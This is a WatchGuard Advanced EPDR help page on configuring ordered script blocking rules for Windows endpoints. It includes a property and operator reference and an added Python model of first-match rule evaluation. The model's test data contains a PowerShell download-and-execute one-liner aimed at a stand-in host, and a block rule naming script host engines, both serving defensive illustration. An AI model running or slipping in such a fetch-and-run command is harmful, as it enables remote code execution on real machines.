Configure Script Blocking (Windows Computers)

Applies To: WatchGuard Advanced EPDR

On the Script Blocking page, you configure rules to allow or block scripts on your endpoints.

Create a script blocking settings profile that you assign to the computers on your network. The settings profile contains a list of rules, and each rule includes a series of attributes that describe a script and an action (block or allow).

Each time a user tries to run a script on the endpoint, Advanced EPDR goes through the rules in the specified order and compares the script with the attributes defined in each rule. When it finds a rule that matches the script, it applies the corresponding action and ends the process. No other rules are considered.

Your operator role determines what you can see and do in WatchGuard Cloud. Your role must have the Configure Script Blocking permission to view or configure this feature. For more information, go to Manage WatchGuard Cloud Operators and Roles.

To configure rules to allow or block scripts:

  1. In WatchGuard Cloud, select Configure > Endpoint Security.
  2. Select Settings.
  3. From the left pane, select Script Blocking.
    The list of existing Script Blocking profiles opens.
  4. Select an existing script blocking profile to edit, copy an existing profile, or in the upper-right corner of the page, click Add to create a new profile.
    The Add Settings or Edit Settings page opens.
  5. Type a Name and Description for the profile, if required.
  6. To add a new rule, click Add Rule.
    The Add Rule page opens.
  7. In the Name text box, type a name for the rule.
  8. From the Action drop-down list, select Allow or Block.
  9. To make the rule active, enable the Active toggle.
  10. To configure the conditions for the rule:
    1. From the Select a Property drop-down list, select a property.
    2. From the Select an Operator drop-down list, select an operator.
    3. From the Select a Value drop-down list, select a value.
      For more information, go to Operators and Values for Each Property.
  11. To add another condition to this rule, click the add icon and repeat Step 10.
  12. To remove a condition from this rule, click the remove icon next to it.
  13. Click Save.
    The rule you added shows at the end of the list of rules.
  14. To add more rules to the settings profile, repeat Steps 6 - 13.
  15. To change rule order, drag a rule to a new position in the list.
    The action of the first rule in the list that matches the attributes of the script applies; later rules are not considered. If no rule matches, the script is allowed to run, so a profile is allow-by-default. To deny scripts you have not explicitly allowed, place the Allow rules first and end the list with a Block rule whose condition matches broadly (for example, Script type In all of the listed types).
  16. To notify computer users about scripts blocked by any of the rules, enable the Notify Computer Users About Blocked Scripts toggle.
  17. (Optional) To add a custom message to the alerts that show on the endpoint, type a message in the Add the Following Custom Message to Alerts text box.
  18. Click Save.
  19. Select the profile and assign recipients, if required.
    For more information, go to Assign a Settings Profile.

To delete a rule from the profile, click the Delete icon.

Operators and Values for Each Property

In a Script Blocking rule, you must select a property, operator, and value for each condition that you configure. This table shows the operators and possible values for each property. Where you match by hash, prefer the SHA-256 properties over the MD5 ones: MD5 collisions are practical, so two different files can share an MD5 value.

Command line
  Command line used to run the script.
  Operators: Is equal to, Contains, Starts with, Ends with
  Values: text

Execution
  Script execution type (local or remote).
  Operators: Is equal to
  Values: Local, Remote

Execution user
  User account that ran the script.
  Operators: Is equal to, In, Starts with, Ends with
  Values: text

Interactive execution
  Script requires an interactive shell.
  Operators: Is equal to
  Values: Yes, No

Loader file name
  Name of the file that interprets the script (for example, the PowerShell or Windows Script Host executable).
  Operators: Is equal to, In, Contains, Starts with, Ends with
  Values: text

Loader MD5
  MD5 of the file that interprets the script.
  Operators: In, Is equal to
  Values: text

Loader path
  Path of the file that interprets the script.
  Operators: Is equal to, Contains, Starts with, Ends with
  Values: text

Loader SHA-256
  SHA-256 of the file that interprets the script.
  Operators: In, Is equal to
  Values: text

Owner
  Owner of the file that contains the script. The value takes one of these forms:
    • Group: Specifies the group name. Example: Administrators.
    • Domain user: Specifies the user principal name (UPN) of the account stored in Active Directory. Example: [email protected]
    • Local user: Specifies the computer name and the local user account. Example: COMPUTER\Administrator.
  Operators: Is equal to, In, Starts with, Ends with
  Values: text

Script file name
  Name of the file that contains the script.
  Operators: Is equal to, In, Contains, Starts with, Ends with
  Values: text

Script MD5
  MD5 of the file that contains the script.
  Operators: In, Is equal to
  Values: text

Script path
  Path of the file that contains the script.
  Operators: Is equal to, Contains, Starts with, Ends with
  Values: text

Script SHA-256
  SHA-256 of the file that contains the script.
  Operators: In, Is equal to
  Values: text

Script type
  Programming language used to write the script, determined from the file extension. Because the type follows the extension, a rule on this property alone does not match a script whose extension was changed; combine it with a Loader file name, Loader path, or Loader SHA-256 condition when that matters.
  Operators: In, Is equal to
  Values: PowerShell, BAT/CMD/LNK, AutoIt, VBS/JS, Python, PHP, MSHTA
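The following Python is an added example, not WatchGuard code. It models the evaluation described in the procedure above (rules walked in list order, first match wins, no match means Allow) together with the operators from the property table, so you can check how a draft rule list behaves before you assign the profile. Assumptions not stated on the page: all conditions inside one rule must match (AND), and string comparison is case-insensitive. The profile, the approved script body, and the events are constructed for the example; the dictionary keys are the page's property names.

```python
"""Model of an ordered, first-match script-blocking profile.

Added example; not WatchGuard code. Property names and operators come from the
property table on this page. Assumptions: conditions inside one rule must all
match (AND), and string comparison is case-insensitive. The profile, the
approved script body and the events below are constructed for the example.
"""
import hashlib

# Operator semantics from the property table. "In" takes a list of values.
OPERATORS = {
    "Is equal to": lambda actual, expected: actual == expected,
    "Contains":    lambda actual, expected: expected in actual,
    "Starts with": lambda actual, expected: actual.startswith(expected),
    "Ends with":   lambda actual, expected: actual.endswith(expected),
    "In":          lambda actual, expected: actual in expected,
}

SCRIPT_TYPES = ["PowerShell", "BAT/CMD/LNK", "AutoIt", "VBS/JS", "Python", "PHP", "MSHTA"]


def sha256_hex(data: bytes) -> str:
    """Digest to paste into a 'Script SHA-256' or 'Loader SHA-256' value."""
    return hashlib.sha256(data).hexdigest()


def _norm(value):
    """Case-insensitive comparison (assumption); hashes compare as lowercase hex."""
    if isinstance(value, (list, tuple, set)):
        return [str(v).lower() for v in value]
    return str(value).lower()


def condition_matches(condition, event):
    prop, operator, expected = condition
    actual = event.get(prop)
    if actual is None:          # property absent from this event: no match
        return False
    return OPERATORS[operator](_norm(actual), _norm(expected))


def rule_matches(rule, event):
    return rule["active"] and all(condition_matches(c, event) for c in rule["conditions"])


def evaluate(profile, event):
    """Walk the rules in list order; the first active rule whose conditions all
    match decides and later rules are ignored. No match returns ("Allow", None),
    mirroring the page: an unmatched script is allowed to run."""
    for rule in profile:
        if rule_matches(rule, event):
            return rule["action"], rule["name"]
    return "Allow", None


def rule(name, action, conditions, active=True):
    return {"name": name, "action": action, "active": active, "conditions": conditions}


# Constructed: the body of the one script that is approved to run.
APPROVED_SCRIPT = b'Get-Service | Where-Object Status -eq "Stopped"\r\n'
APPROVED_DIR = "C:\\ProgramData\\Corp\\Scripts\\"

PROFILE = [
    # Pin the approved script by path AND hash; a path-only Allow is satisfied
    # by dropping any file into that directory.
    rule("Allow approved inventory script", "Allow", [
        ("Script path", "Starts with", APPROVED_DIR),
        ("Script SHA-256", "In", [sha256_hex(APPROVED_SCRIPT)]),
    ]),
    rule("Block remote PowerShell", "Block", [
        ("Script type", "Is equal to", "PowerShell"),
        ("Execution", "Is equal to", "Remote"),
    ]),
    rule("Block HTA and Windows Script Host engines", "Block", [
        ("Loader file name", "In", ["mshta.exe", "wscript.exe", "cscript.exe"]),
    ]),
    # Last rule: turns the allow-by-default profile into deny-by-default.
    rule("Default deny", "Block", [("Script type", "In", SCRIPT_TYPES)]),
]

# Constructed events, keyed by the page's property names.
APPROVED_EVENT = {
    "Script path": APPROVED_DIR + "inventory.ps1",
    "Script SHA-256": sha256_hex(APPROVED_SCRIPT),
    "Script type": "PowerShell", "Execution": "Local", "Loader file name": "powershell.exe",
}
COPIED_EVENT = dict(APPROVED_EVENT, **{"Script path": "C:\\Users\\alice\\Downloads\\inventory.ps1"})
REMOTE_PS_EVENT = dict(APPROVED_EVENT, **{"Execution": "Remote",
                                          "Script SHA-256": sha256_hex(b"iex(irm http://example.invalid/p)")})
HTA_EVENT = {"Script path": "C:\\Temp\\update.hta", "Script type": "MSHTA", "Execution": "Local",
             "Loader file name": "mshta.exe", "Script SHA-256": sha256_hex(b"<script>x</script>")}

if __name__ == "__main__":
    for label, ev in [("approved", APPROVED_EVENT), ("copied", COPIED_EVENT),
                      ("remote ps", REMOTE_PS_EVENT), ("hta", HTA_EVENT)]:
        print(f"{label:10} -> {evaluate(PROFILE, ev)}")
    # Same profile without the catch-all: an unknown loader falls through to Allow.
    print("no catch-all ->", evaluate(PROFILE[:-1], dict(HTA_EVENT, **{"Loader file name": "custom.exe"})))
```

Two points the run makes visible: the approved script executed remotely is still allowed, because the Allow rule sits above the remote-PowerShell Block and first match wins; and dropping the final catch-all rule silently returns the profile to allow-by-default for anything the explicit Block rules miss.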

Related Topics

Manage Endpoint Groups in Endpoint Security

Assign a Settings Profile

Multi-Tenant Management — Script Control